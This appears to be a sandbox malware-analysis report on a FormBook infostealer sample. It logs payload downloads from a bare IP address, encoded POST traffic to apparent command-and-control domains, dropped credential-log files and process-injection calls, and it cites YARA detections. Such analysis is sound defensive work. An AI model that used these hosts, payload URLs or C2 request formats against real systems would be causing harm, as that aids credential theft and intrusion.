      Source: global trafficHTTP traffic detected: POST /j4h/ HTTP/1.1Host: www.hbyidong.comConnection: closeContent-Length: 155857Cache-Control: no-cacheOrigin: http://www.hbyidong.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.hbyidong.com/j4h/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4d 36 41 64 76 70 71 3d 6a 64 34 37 61 66 30 58 45 62 66 72 62 78 33 52 73 68 79 35 35 62 4a 75 74 74 75 6b 5a 54 58 43 64 49 64 69 6c 50 6c 58 55 6a 7a 6a 78 47 57 66 36 74 54 36 4e 64 33 45 67 72 35 43 6f 30 49 79 64 51 6e 58 33 4b 48 39 46 4c 41 6d 6d 6d 74 64 48 46 50 43 44 45 6a 30 59 43 77 6b 69 35 6c 42 5a 48 75 4c 6f 39 35 70 72 4a 78 6a 69 55 4f 4d 44 78 77 4c 4c 35 41 46 49 66 79 56 75 7a 77 44 63 4f 70 58 6d 56 7a 2d 55 50 4c 61 5a 47 50 37 4e 57 6f 6d 61 74 28 4d 55 51 4b 30 28 75 30 6b 59 69 33 37 50 53 7e 50 44 52 69 73 56 54 6b 68 4b 37 74 46 68 58 73 39 39 71 78 5f 6d 4c 78 47 57 50 6f 77 32 4e 30 31 36 63 6e 65 43 7a 30 5a 6b 41 67 62 4d 31 75 79 62 32 79 64 59 32 28 6e 41 4c 61 6b 39 73 65 5f 31 61 34 55 68 72 6e 4d 32 32 4a 78 4b 5f 70 68 44 59 67 67 65 63 41 78 41 70 4f 72 4a 63 62 55 46 58 6c 33 57 30 34 4a 49 65 49 75 75 39 79 41 32 7a 7e 6a 4f 44 48 41 7e 75 6f 6c 7a 43 51 61 70 4c 70 37 69 31 41 54 71 7a 30 66 6e 51 77 54 7a 38 6c 6c 4e 68 62 4c 6e 67 45 6a 33 50 52 71 4c 73 6d 72 61 64 55 54 4b 33 56 56 28 59 37 52 31 53 4a 79 7a 58 72 64 74 31 47 6b 58 6f 4c 38 77 33 6b 68 65 4f 4d 75 28 4b 57 6e 68 4f 74 79 78 6e 4d 42 4f 4d 44 6f 74 4d 45 34 64 59 50 47 32 30 50 54 59 36 37 6c 44 68 53 42 6e 5a 48 78 75 42 75 64 55 77 44 2d 42 58 32 6a 69 39 77 32 51 58 54 70 45 66 38 51 67 5a 33 59 56 46 35 79 5a 42 35 56 47 36 70 35 41 4d 4a 47 38 77 76 43 4c 5f 6d 38 41 72 33 45 67 4a 37 4f 43 33 71 71 53 43 55 42 28 6c 52 44 59 6f 70 71 7a 41 6a 6f 44 6b 33 73 33 45 55 6c 76 73 31 43 52 55 75 56 64 4f 70 64 41 37 6a 78 28 78 67 68 77 36 33 78 55 75 54 39 73 73 6a 32 6a 63 6e 34 6d 6e 35 4b 61 36 65 4c 4d 5a 33 5a 64 7a 73 42 56 52 72 61 66 39 65 6a 66 32 30 57 6e 75 74 37 67 49 51 45 72 57 30 34 52 6c 63 4e 37 48 6f 44 4e 74 63 53 39 2d 74 6b 30 31 56 4c 46 67 5a 36 55 75 6e 53 72 37 6d 57 58 65 6c 74 6f 62 6d 77 37 45 4d 36 68 6f 56 79 63 4f 66 73 5a 30 74 70 57 79 6f 36 47 44 5a 6f 4d 43 65 54 72 76 5a 5f 34 5f 76 46 53 37 34 70 6d 42 55 49 50 76 71 7a 34 44 42 58 43 56 50 51 65 41 4f 6e 66 67 68 4e 66 76 4e 6a 66 44 75 74 79 63 62 4e 4c 34 70 69 70 46 7a 68 36 70 32 46 31 53 78 6d 7e 75 52 62 28 34 62 35 62 4c 51 72 64 75 6f 6a 69 53 52 73 76 43 41 74 56 51 55 69 45 33 48 4a 45 62 63 63 63 74 4d 48 6c 4a 4f 64 74 79 46 49 63 43 32 42 5a 75 59 49 39 32 7a 6f 63 37 66 76 4f 75 6f 5f 61 65 79 68 49 36 32 35 67 38 49 32 74 4f 4c 67 4a 70 46 59 62 75 61 31 78 4d 4e 48 4a 51 71 35 75 77 6a 66 78 32 66 68 74 7a 77 41 46 6b 56 39 34 37 4e 70 34 6a 75 72 5a 31 72 52 75 69 68 52 70 35 54 56 33 6b 43 47 31 73 31 6d 63 75 77 67 4d 67 5a 31 37 54 4
      Source: unknownTCP traffic detected without corresponding DNS query: 149.255.36.133
      Source: unknownTCP traffic detected without corresponding DNS query: 149.255.36.133
      Source: unknownTCP traffic detected without corresponding DNS query: 149.255.36.133
      Source: unknownTCP traffic detected without corresponding DNS query: 149.255.36.133
      Source: unknownTCP traffic detected without corresponding DNS query: 149.255.36.133
      Source: unknownTCP traffic detected without corresponding DNS query: 149.255.36.133
      Source: unknownTCP traffic detected without corresponding DNS query: 149.255.36.133
      Source: unknownTCP traffic detected without corresponding DNS query: 149.255.36.133
      Source: unknownTCP traffic detected without corresponding DNS query: 149.255.36.133
      Source: unknownTCP traffic detected without corresponding DNS query: 149.255.36.133
      Source: unknownTCP traffic detected without corresponding DNS query: 149.255.36.133
      Source: unknownTCP traffic detected without corresponding DNS query: 149.255.36.133
      Source: unknownTCP traffic detected without corresponding DNS query: 149.255.36.133
      Source: unknownTCP traffic detected without corresponding DNS query: 149.255.36.133
      Source: unknownTCP traffic detected without corresponding DNS query: 149.255.36.133
      Source: unknownTCP traffic detected without corresponding DNS query: 149.255.36.133
      Source: unknownTCP traffic detected without corresponding DNS query: 149.255.36.133
      Source: unknownTCP traffic detected without corresponding DNS query: 149.255.36.133
      Source: unknownTCP traffic detected without corresponding DNS query: 149.255.36.133
      Source: unknownTCP traffic detected without corresponding DNS query: 149.255.36.133
      Source: unknownTCP traffic detected without corresponding DNS query: 149.255.36.133
      Source: unknownTCP traffic detected without corresponding DNS query: 149.255.36.133
      Source: unknownTCP traffic detected without corresponding DNS query: 149.255.36.133
      Source: unknownTCP traffic detected without corresponding DNS query: 149.255.36.133
      Source: unknownTCP traffic detected without corresponding DNS query: 149.255.36.133
      Source: unknownTCP traffic detected without corresponding DNS query: 149.255.36.133
      Source: unknownTCP traffic detected without corresponding DNS query: 149.255.36.133
      Source: unknownTCP traffic detected without corresponding DNS query: 149.255.36.133
      Source: unknownTCP traffic detected without corresponding DNS query: 149.255.36.133
      Source: unknownTCP traffic detected without corresponding DNS query: 149.255.36.133
      Source: unknownTCP traffic detected without corresponding DNS query: 149.255.36.133
      Source: unknownTCP traffic detected without corresponding DNS query: 149.255.36.133
      Source: unknownTCP traffic detected without corresponding DNS query: 149.255.36.133
      Source: unknownTCP traffic detected without corresponding DNS query: 149.255.36.133
      Source: unknownTCP traffic detected without corresponding DNS query: 149.255.36.133
      Source: unknownTCP traffic detected without corresponding DNS query: 149.255.36.133
      Source: unknownTCP traffic detected without corresponding DNS query: 149.255.36.133
      Source: unknownTCP traffic detected without corresponding DNS query: 149.255.36.133
      Source: unknownTCP traffic detected without corresponding DNS query: 149.255.36.133
      Source: unknownTCP traffic detected without corresponding DNS query: 149.255.36.133
      Source: unknownTCP traffic detected without corresponding DNS query: 149.255.36.133
      Source: unknownTCP traffic detected without corresponding DNS query: 149.255.36.133
      Source: unknownTCP traffic detected without corresponding DNS query: 149.255.36.133
      Source: unknownTCP traffic detected without corresponding DNS query: 149.255.36.133
      Source: unknownTCP traffic detected without corresponding DNS query: 149.255.36.133
      Source: unknownTCP traffic detected without corresponding DNS query: 149.255.36.133
      Source: unknownTCP traffic detected without corresponding DNS query: 149.255.36.133
      Source: unknownTCP traffic detected without corresponding DNS query: 149.255.36.133
      Source: unknownTCP traffic detected without corresponding DNS query: 149.255.36.133
      Source: unknownTCP traffic detected without corresponding DNS query: 149.255.36.133
      Source: global trafficHTTP traffic detected: GET /bin_PqLAqQjAza233.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 149.255.36.133Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j4h/?M6Advpq=7t4HToMigGNwJPMQvt254oF1CV/eJdQMsFShHVoBivPn5D5h8CbCS8esBGhfsVKMtt2q&Lv=EN9tiz_Hl HTTP/1.1Host: www.topemailleads.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /bin_PqLAqQjAza233.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 149.255.36.133Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /bin_PqLAqQjAza233.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 149.255.36.133Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /bin_PqLAqQjAza233.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 149.255.36.133Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /j4h/?M6Advpq=H51V9duMqRnbj95D1MvvJ7i7VbIcWL9pj3QvEMEhOvjHnOj6szug+8ev4DeAite72oGg&Lv=EN9tiz_Hl HTTP/1.1Host: www.writusp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /j4h/?M6Advpq=r/0BE7VwGcmVNDbls0v6gsZ9vdmzPgP8APQlxcRpFAvW8Fym0NKLGN6V/aQwsh4AIT2y&Lv=EN9tiz_Hl HTTP/1.1Host: www.hbyidong.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /j4h/?M6Advpq=r/0BE7VwGcmVNDbls0v6gsZ9vdmzPgP8APQlxcRpFAvW8Fym0NKLGN6V/aQwsh4AIT2y&Lv=EN9tiz_Hl HTTP/1.1Host: www.hbyidong.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /j4h/?M6Advpq=r/0BE7VwGcmVNDbls0v6gsZ9vdmzPgP8APQlxcRpFAvW8Fym0NKLGN6V/aQwsh4AIT2y&Lv=EN9tiz_Hl HTTP/1.1Host: www.hbyidong.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /j4h/?M6Advpq=r/0BE7VwGcmVNDbls0v6gsZ9vdmzPgP8APQlxcRpFAvW8Fym0NKLGN6V/aQwsh4AIT2y&Lv=EN9tiz_Hl HTTP/1.1Host: www.hbyidong.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /j4h/?M6Advpq=r/0BE7VwGcmVNDbls0v6gsZ9vdmzPgP8APQlxcRpFAvW8Fym0NKLGN6V/aQwsh4AIT2y&Lv=EN9tiz_Hl HTTP/1.1Host: www.hbyidong.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /j4h/?M6Advpq=r/0BE7VwGcmVNDbls0v6gsZ9vdmzPgP8APQlxcRpFAvW8Fym0NKLGN6V/aQwsh4AIT2y&Lv=EN9tiz_Hl HTTP/1.1Host: www.hbyidong.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /j4h/?M6Advpq=r/0BE7VwGcmVNDbls0v6gsZ9vdmzPgP8APQlxcRpFAvW8Fym0NKLGN6V/aQwsh4AIT2y&Lv=EN9tiz_Hl HTTP/1.1Host: www.hbyidong.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /j4h/?M6Advpq=r/0BE7VwGcmVNDbls0v6gsZ9vdmzPgP8APQlxcRpFAvW8Fym0NKLGN6V/aQwsh4AIT2y&Lv=EN9tiz_Hl HTTP/1.1Host: www.hbyidong.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /j4h/?M6Advpq=r/0BE7VwGcmVNDbls0v6gsZ9vdmzPgP8APQlxcRpFAvW8Fym0NKLGN6V/aQwsh4AIT2y&Lv=EN9tiz_Hl HTTP/1.1Host: www.hbyidong.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /j4h/?M6Advpq=7t4HToMigGNwJPMQvt254oF1CV/eJdQMsFShHVoBivPn5D5h8CbCS8esBGhfsVKMtt2q&Lv=EN9tiz_Hl HTTP/1.1Host: www.topemailleads.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: unknownDNS traffic detected: queries for: www.contactsweeper.com
      Source: unknownHTTP traffic detected: POST /j4h/ HTTP/1.1Host: www.writusp.comConnection: closeContent-Length: 413Cache-Control: no-cacheOrigin: http://www.writusp.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.writusp.com/j4h/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4d 36 41 64 76 70 71 3d 50 62 35 76 6a 37 66 36 71 58 4b 52 78 61 73 77 36 4a 61 43 4a 76 61 7a 53 35 31 4e 61 4c 5a 75 36 54 4e 39 51 38 77 42 4f 65 7a 37 32 71 72 79 75 68 76 57 39 4c 7a 4c 6b 44 58 34 36 59 36 71 33 36 58 53 42 48 51 45 68 68 56 5f 4d 50 48 30 4f 6c 52 53 35 49 33 4d 69 73 43 66 47 42 48 70 43 45 74 67 49 56 30 76 66 6b 64 71 6a 6b 32 6b 77 79 6c 66 73 44 67 6f 76 39 36 33 72 42 67 77 61 51 6c 44 69 4d 59 52 6d 59 49 61 4b 44 30 6c 4f 64 79 52 58 65 6e 5a 49 48 6a 69 4b 74 4c 53 34 74 4e 63 39 4f 73 76 31 65 5a 75 7e 67 6e 52 30 6c 65 66 61 61 79 59 34 2d 57 70 42 39 63 66 35 33 75 47 74 37 55 66 50 59 65 4f 52 65 47 72 5a 52 28 56 42 77 47 51 7e 7a 7e 61 55 53 45 36 37 74 62 43 6d 75 4b 57 30 49 4d 5f 56 45 74 52 6b 2d 7a 53 4b 63 63 77 35 53 59 77 35 37 74 64 55 31 78 74 67 70 53 2d 70 6d 54 52 38 6c 70 61 48 78 43 41 67 7a 6b 32 64 46 58 73 47 31 4d 58 6c 68 69 43 4b 4d 6d 59 52 54 4f 33 79 73 76 76 7a 73 47 68 33 43 44 36 43 63 7e 41 4e 30 30 58 59 58 71 5f 4e 30 61 5a 61 67 74 76 66 53 39 42 46 6c 58 4c 45 34 63 74 30 66 77 35 6e 7a 76 69 49 45 71 37 67 72 34 6d 55 43 58 76 65 4c 4b 56 5a 44 57 4b 53 30 48 79 73 53 79 45 4c 6d 77 6b 31 53 49 6b 30 59 35 68 37 75 32 5f 71 78 6e 4c 42 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: M6Advpq=Pb5vj7f6qXKRxasw6JaCJvazS51NaLZu6TN9Q8wBOez72qryuhvW9LzLkDX46Y6q36XSBHQEhhV_MPH0OlRS5I3MisCfGBHpCEtgIV0vfkdqjk2kwylfsDgov963rBgwaQlDiMYRmYIaKD0lOdyRXenZIHjiKtLS4tNc9Osv1eZu~gnR0lefaayY4-WpB9cf53uGt7UfPYeOReGrZR(VBwGQ~z~aUSE67tbCmuKW0IM_VEtRk-zSKccw5SYw57tdU1xtgpS-pmTR8lpaHxCAgzk2dFXsG1MXlhiCKMmYRTO3ysvvzsGh3CD6Cc~AN00XYXq_N0aZagtvfS9BFlXLE4ct0fw5nzviIEq7gr4mUCXveLKVZDWKS0HysSyELmwk1SIk0Y5h7u2_qxnLBQ).
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 08 Jun 2020 03:58:01 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 327Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6a 34 68 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /j4h/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: olotql9xtrtpnd.exe, 00000014.00000002.1583495151.0000000000960000.00000004.00000020.sdmpString found in binary or memory: http://149.255.36.133/bin_Pq
      Source: order.exe.exe, 00000001.00000002.914876984.0000000000560000.00000040.00000001.sdmp, olotql9xtrtpnd.exe, 00000014.00000003.1566338299.000000000099A000.00000004.00000001.sdmp, olotql9xtrtpnd.exe, 00000015.00000002.1586660760.0000000000560000.00000040.00000001.sdmp, olotql9xtrtpnd.exe, 00000016.00000002.1611647549.0000000000560000.00000040.00000001.sdmpString found in binary or memory: http://149.255.36.133/bin_PqLAqQjAza233.bin
      Source: olotql9xtrtpnd.exe, 00000014.00000003.1566338299.000000000099A000.00000004.00000001.sdmpString found in binary or memory: http://149.255.36.133/bin_PqLAqQjAza233.bin/
      Source: olotql9xtrtpnd.exe, 00000014.00000002.1583495151.0000000000960000.00000004.00000020.sdmpString found in binary or memory: http://149.255.36.133/bin_PqLAqQjAza233.bin0e
      Source: olotql9xtrtpnd.exe, 00000014.00000002.1583495151.0000000000960000.00000004.00000020.sdmpString found in binary or memory: http://149.255.36.133/bin_PqLAqQjAza233.bin1
      Source: olotql9xtrtpnd.exe, 00000014.00000002.1583495151.0000000000960000.00000004.00000020.sdmpString found in binary or memory: http://149.255.36.133/bin_PqLAqQjAza233.binE
      Source: olotql9xtrtpnd.exe, 00000014.00000003.1566338299.000000000099A000.00000004.00000001.sdmpString found in binary or memory: http://149.255.36.133/bin_PqLAqQjAza233.bin_
      Source: explorer.exe, 00000007.00000000.896771704.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
      Source: control.exe, 00000008.00000002.2476345545.0000000002C73000.00000004.00000020.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eas/sc/2b/a5ea21.icoX_
      Source: explorer.exe, 00000007.00000002.2473901705.0000000000CF0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
      Source: explorer.exe, 00000007.00000000.896771704.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: explorer.exe, 00000007.00000000.896771704.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
      Source: explorer.exe, 00000007.00000000.896771704.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
      Source: explorer.exe, 00000007.00000000.896771704.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
      Source: explorer.exe, 00000007.00000000.896771704.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
      Source: explorer.exe, 00000007.00000000.896771704.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
      Source: explorer.exe, 00000007.00000000.896771704.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
      Source: control.exe, 00000008.00000002.2479653154.0000000004ED9000.00000004.00000001.sdmpString found in binary or memory: http://www.hbyidong.com
      Source: control.exe, 00000008.00000002.2479653154.0000000004ED9000.00000004.00000001.sdmpString found in binary or memory: http://www.hbyidong.com/j4h/
      Source: explorer.exe, 00000007.00000000.896771704.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
      Source: control.exe, 00000008.00000002.2476345545.0000000002C73000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
      Source: control.exe, 00000008.00000002.2476325402.0000000002C6C000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/de-ch/ocid=iehp5
      Source: control.exe, 00000008.00000002.2476345545.0000000002C73000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/ocid=iehp
      Source: explorer.exe, 00000007.00000000.896771704.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
      Source: explorer.exe, 00000007.00000000.896771704.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
      Source: explorer.exe, 00000007.00000000.896771704.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
      Source: explorer.exe, 00000007.00000000.896771704.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
      Source: explorer.exe, 00000007.00000000.896771704.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
      Source: explorer.exe, 00000007.00000000.896771704.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

      E-Banking Fraud:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000015.00000002.1592683082.000000001F080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000019.00000002.1614780220.0000000000110000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000002.1583585086.0000000000590000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.1611465556.0000000000060000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.2471801241.00000000005D0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000002.1586527036.0000000000060000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.914633096.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.2472989591.0000000000A40000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000014.00000002.1590005751.000000001F080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000018.00000002.1590663270.0000000002D80000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.2471201439.0000000000560000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000014.00000002.1581333071.0000000000060000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.1615263059.000000001F0A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.919876173.000000001EF20000.00000040.00000001.sdmp, type: MEMORY

      System Summary:

      barindex
      Detected FormBook malwareShow sources
      Source: C:\Windows\SysWOW64\control.exeDropped file: C:\Users\user\AppData\Roaming\8MN1SC8U\8MNlogri.iniJump to dropped file
      Source: C:\Windows\SysWOW64\control.exeDropped file: C:\Users\user\AppData\Roaming\8MN1SC8U\8MNlogrf.iniJump to dropped file
      Source: C:\Windows\SysWOW64\control.exeDropped file: C:\Users\user\AppData\Roaming\8MN1SC8U\8MNlogrv.iniJump to dropped file
      Malicious sample detected (through community Yara rule)Show sources
      Source: 00000015.00000002.1592683082.000000001F080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000015.00000002.1592683082.000000001F080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000019.00000002.1614780220.0000000000110000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000019.00000002.1614780220.0000000000110000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000017.00000002.1583585086.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000017.00000002.1583585086.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000016.00000002.1611465556.0000000000060000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000016.00000002.1611465556.0000000000060000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000008.00000002.2471801241.00000000005D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000008.00000002.2471801241.00000000005D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000015.00000002.1586527036.0000000000060000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000015.00000002.1586527036.0000000000060000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000001.00000002.914633096.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000001.00000002.914633096.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000008.00000002.2479356539.0000000004D5F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 00000008.00000002.2472989591.0000000000A40000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000008.00000002.2472989591.0000000000A40000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000014.00000002.1590005751.000000001F080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000014.00000002.1590005751.000000001F080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000018.00000002.1590663270.0000000002D80000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000018.00000002.1590663270.0000000002D80000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000008.00000002.2471201439.0000000000560000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000008.00000002.2471201439.0000000000560000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000014.00000002.1581333071.0000000000060000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000014.00000002.1581333071.0000000000060000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000016.00000002.1615263059.000000001F0A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000016.00000002.1615263059.000000001F0A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000001.00000002.919876173.000000001EF20000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000001.00000002.919876173.000000001EF20000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Initial sample is a PE file and has a suspicious nameShow sources
      Source: initial sampleStatic PE information: Filename: order.exe.exe
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 0_2_02180F70 NtWriteVirtualMemory,0_2_02180F70
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 0_2_02182DAB NtResumeThread,0_2_02182DAB
